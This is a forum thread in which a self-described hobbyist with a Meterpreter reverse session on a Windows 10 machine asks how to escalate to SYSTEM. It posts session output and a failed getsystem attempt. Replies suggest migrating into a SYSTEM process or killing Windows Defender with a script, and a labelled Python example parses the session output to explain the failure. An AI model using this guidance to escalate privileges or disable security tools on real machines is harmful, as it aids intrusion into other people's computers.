
PrivEsc lpe windows meterpreter

goingHeavenTogether (HDD-drive, User; registered 28.11.2024; 41 posts, 16 reactions)
hi. The software makes a reverse connection over https. This is the access I have right now. Question: how can I elevate to SYSTEM from here?

Sorry, stupid question. I am a pentest hobbyist.

p.s. Windows Defender is running on the box.

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
SeChangeNotifyPrivilege

meterpreter > sysinfo
Computer : DESKTOP-P4V5R4I
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : ru_RU
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
8 732 svchost.exe
124 4 Registry
408 4 smss.exe
472 732 svchost.exe
512 500 csrss.exe
588 500 wininit.exe
596 580 csrss.exe
688 580 winlogon.exe
732 588 services.exe
752 588 lsass.exe
852 732 svchost.exe
860 732 svchost.exe
872 860 SecHealthUI.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
888 688 fontdrvhost.exe
896 588 fontdrvhost.exe
980 688 dwm.exe
992 732 svchost.exe
1056 860 SearchApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1076 860 dllhost.exe
1168 732 svchost.exe
1216 732 svchost.exe
1224 732 svchost.exe
1256 732 svchost.exe
1288 732 svchost.exe
1296 732 svchost.exe
1304 732 svchost.exe
1376 732 svchost.exe
1404 732 svchost.exe
1412 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
1468 732 svchost.exe
1508 732 VBoxService.exe
1552 732 svchost.exe
1560 732 svchost.exe
1568 732 svchost.exe
1652 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
1660 732 svchost.exe
1684 732 svchost.exe
1712 2944 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
1736 732 svchost.exe
1744 732 svchost.exe
1764 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
1776 732 svchost.exe
1804 4 Memory Compression
1844 732 svchost.exe
1860 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
1868 732 svchost.exe
1884 732 svchost.exe
1948 732 svchost.exe
2036 732 svchost.exe
2108 732 svchost.exe
2228 732 svchost.exe
2332 732 svchost.exe
2336 732 svchost.exe
2344 732 svchost.exe
2352 732 svchost.exe
2436 732 svchost.exe
2480 732 svchost.exe
2592 732 spoolsv.exe
2632 732 svchost.exe
2688 732 svchost.exe
2708 732 svchost.exe
2788 732 svchost.exe
2876 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
2888 732 svchost.exe
2944 860 SearchApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
2968 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3012 852 ctfmon.exe x64 1
3016 732 svchost.exe
3028 732 svchost.exe
3056 732 svchost.exe
3064 732 svchost.exe
3096 1256 MicrosoftEdgeUpdate.exe
3152 732 MsMpEng.exe
3196 732 MpDefenderCoreService.exe
3232 732 svchost.exe
3304 860 SecurityHealthHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\SecurityHealthHost.exe
3368 732 svchost.exe
3408 732 svchost.exe
3820 732 SearchIndexer.exe
3920 1376 sihost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\sihost.exe
3948 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
3976 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
4040 1256 taskhostw.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\taskhostw.exe
4188 732 svchost.exe
4228 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4240 732 svchost.exe
4464 7160 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4672 732 svchost.exe
4912 3016 AggregatorHost.exe
4952 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
4988 4932 explorer.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\explorer.exe
5148 732 svchost.exe
5352 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
5508 4988 GUP.exe x64 1 DESKTOP-P4V5R4I\vic C:\Users\vic\Desktop\updater\GUP.exe
5564 732 svchost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\svchost.exe
5616 860 StartMenuExperienceHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
5876 732 NisSrv.exe
6100 860 SkypeBackgroundHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
6124 732 svchost.exe
6424 732 svchost.exe
6532 732 svchost.exe
6584 860 ApplicationFrameHost.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\ApplicationFrameHost.exe
6676 732 svchost.exe
6912 4988 SecurityHealthSystray.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\SecurityHealthSystray.exe
6948 732 SecurityHealthService.exe
7004 4988 VBoxTray.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\VBoxTray.exe
7024 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
7140 4988 OneDrive.exe x86 1 DESKTOP-P4V5R4I\vic C:\Users\vic\AppData\Local\Microsoft\OneDrive\OneDrive.exe
7160 4988 msedge.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
7200 860 SkypeApp.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
7208 1712 msedgewebview2.exe x64 1 DESKTOP-P4V5R4I\vic C:\Program Files (x86)\Microsoft\EdgeWebView\Application\141.0.3537.85\msedgewebview2.exe
7552 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
7728 732 svchost.exe
7784 860 RuntimeBroker.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\System32\RuntimeBroker.exe
8008 732 svchost.exe
8072 732 svchost.exe
 
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: All pipe instances are busy. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
 
You look at the processes with the ps command, then pick a process that is running as SYSTEM, then the migrate command with the PID (process number), then getsystem; it may help.
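Before trying `getsystem` again or picking a `migrate` target, it is worth reading what the session has already printed. The script below is an added example for this thread (it is not from the original post, nor Metasploit code): it parses the `getprivs` and `ps` text exactly as Meterpreter prints it and reports two things. First, which token privileges are enabled: the named-pipe impersonation and token-duplication techniques that `getsystem` cycles through rely on SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (or on an already-elevated token), and none of those appear in the posted `getprivs` list, which is why every technique failed. Second, which processes the token could open: Meterpreter fills the Arch/Session/User/Path columns of `ps` only for processes it managed to open, so a row with a blank User column, which is every SYSTEM-owned process in the posted listing, is not something this token can migrate into. The privilege sets and the excerpt of the thread's own output embedded below are the example's choices; the rows are copied from the listing above, not constructed.

```python
"""Triage a Meterpreter session from its own getprivs / ps output.

Added example for this thread, not code from the original post or from
Metasploit.  It answers two questions before anyone types `getsystem` or
`migrate`: which token privileges are enabled, and which processes the
session could actually open (Meterpreter leaves User/Path blank in `ps`
when OpenProcess failed, so those rows are not migration targets).
"""
import re

# getprivs output as posted in the thread (copied, not constructed).
GETPRIVS_OUTPUT = """
Enabled Process Privileges
==========================

Name
----
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
SeChangeNotifyPrivilege
"""

# Representative rows from the ps output posted in the thread (copied, not constructed).
PS_OUTPUT = r"""
Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
732 588 services.exe
752 588 lsass.exe
872 860 SecHealthUI.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
1508 732 VBoxService.exe
3012 852 ctfmon.exe x64 1
3152 732 MsMpEng.exe
4988 4932 explorer.exe x64 1 DESKTOP-P4V5R4I\vic C:\Windows\explorer.exe
5508 4988 GUP.exe x64 1 DESKTOP-P4V5R4I\vic C:\Users\vic\Desktop\updater\GUP.exe
7140 4988 OneDrive.exe x86 1 DESKTOP-P4V5R4I\vic C:\Users\vic\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"""

# Privileges the pipe/token techniques that getsystem attempts depend on.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
# Other privileges that would change the escalation picture (example's own selection).
HIGH_VALUE_PRIVS = {"SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
                    "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege",
                    "SeTcbPrivilege", "SeCreateTokenPrivilege"}

PRIV_RE = re.compile(r"^Se\w+Privilege$")
# PID PPID Name [Arch Session [User Path]]; Name may contain spaces ([System Process]),
# so it is matched lazily and the optional tail is anchored on the Arch column.
PS_ROW_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+)(?:\s+(?P<user>\S+)\s+(?P<path>.+))?)?$"
)


def parse_getprivs(text):
    """Return the set of privilege names listed by `getprivs`."""
    return {ln.strip() for ln in text.splitlines() if PRIV_RE.match(ln.strip())}


def parse_ps(text):
    """One dict per process row; arch/session/user/path are None where Meterpreter left them blank."""
    rows = []
    for ln in text.splitlines():
        m = PS_ROW_RE.match(ln.strip())
        if m:
            rows.append({k: (int(v) if k in ("pid", "ppid") else v) for k, v in m.groupdict().items()})
    return rows


def triage(getprivs_text, ps_text):
    """Summarise what the token holds and which processes it could open."""
    privs = parse_getprivs(getprivs_text)
    procs = parse_ps(ps_text)
    openable = [p for p in procs if p["user"]]
    return {
        "privileges": sorted(privs),
        "impersonation_privs": sorted(privs & IMPERSONATION_PRIVS),
        "high_value_privs": sorted(privs & HIGH_VALUE_PRIVS),
        "process_count": len(procs),
        "openable_pids": [p["pid"] for p in openable],
        "openable_owners": sorted({p["user"] for p in openable}),
        "blank_user_pids": [p["pid"] for p in procs if not p["user"]],
    }


def verdict(report):
    """Plain-language conclusions drawn from the triage report."""
    out = []
    if report["impersonation_privs"]:
        out.append("impersonation privilege present: getsystem's pipe/token techniques are worth trying")
    else:
        out.append("no SeImpersonate/SeAssignPrimaryToken: the techniques getsystem tries need them "
                   "(or an elevated token), so its failure is expected")
    if report["high_value_privs"]:
        out.append("high-value privileges enabled: " + ", ".join(report["high_value_privs"]))
    else:
        out.append("only default user privileges enabled")
    out.append(f"{len(report['openable_pids'])} of {report['process_count']} processes openable, "
               "all owned by: " + ", ".join(report["openable_owners"]))
    if report["blank_user_pids"]:
        out.append("blank-User rows (not openable, so not migration targets): "
                   + ", ".join(map(str, report["blank_user_pids"])))
    return out


if __name__ == "__main__":
    for line in verdict(triage(GETPRIVS_OUTPUT, PS_OUTPUT)):
        print("-", line)
```

Run against the posted output it reports that only the default user privileges are enabled and that the only openable processes belong to DESKTOP-P4V5R4I\vic, so neither path suggested so far (getsystem, or migrating into a SYSTEM process) is available to this token as it stands. The ctfmon.exe row shows the partially visible case, where Meterpreter could read the architecture and session but not the owner.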
 
Or find a script that kills Defender via PowerShell.
Defender won't be killed that easily by a script...
OK, let's say you've killed Defender, and then what?..
 